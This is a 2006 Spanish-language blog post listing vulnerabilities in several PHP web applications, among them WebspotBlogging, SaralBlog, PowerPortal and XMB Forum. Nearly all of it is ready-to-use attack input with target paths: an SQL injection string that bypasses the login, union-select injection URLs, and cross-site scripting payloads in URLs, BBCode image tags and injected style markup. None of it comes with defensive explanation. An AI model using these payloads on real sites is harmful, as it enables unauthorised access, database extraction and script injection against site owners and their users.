ecoestadistica.com

miércoles, enero 18, 2006

Vulnerabilidades...

WebspotBlogging Authentication Bypass

Link: http://host/webspot/login.php
Username: aaaa' union select 1,2,3,1,1,6, 7/*
Password: cualquiera

--------------------------------------------------------------

SaralBlog XSS & Multiple SQL Injection

1. SQL Injection Ejemplo:
http://host/viewprofile.php? id=999%20union% 20select%201, 2,3,4,5,6,7/*


2. SQL Injection Ejemplo (gpc_magic_quotes: off):

Search:
aaaaa') union select 1,2,3,4,5,6/*


3. Cross-Site Scripting

agregue un nuevo comentario:
Website: javascript:alert(123

--------------------------------------------------------------

PowerPortal XSS

Vuln XSS :
http://www.example.com/modules/content/search.php?func=results&search=[XSS]
http://www.example.com/modules/content/search.php?search=[XSS]&func=results
http://www.example.com/modules/links/index.php?search=[XSS]func=search_results

--------------------------------------------------------------

Phpclanwebsite BBCode IMG Tag XSS

img]javascript:alert('XSS')[/img

--------------------------------------------------------------

XMB Forum HTML Code Injection

postee este codigo:
img src=javascript:alert('XSS')

--------------------------------------------------------------

Land Down Under Signature HTML Code Injection

Ejemplo:
STYLE =text/css>BODY { background-image: url('http://www.geocities.com/night_warrior771/
blank.jpeg'); }/STYLE

--------------------------------------------------------------

Vulnerabilidades descubiertas por night_warrior771
night_warrior771[at]hotmail.com

salu2

ecoestadistica.com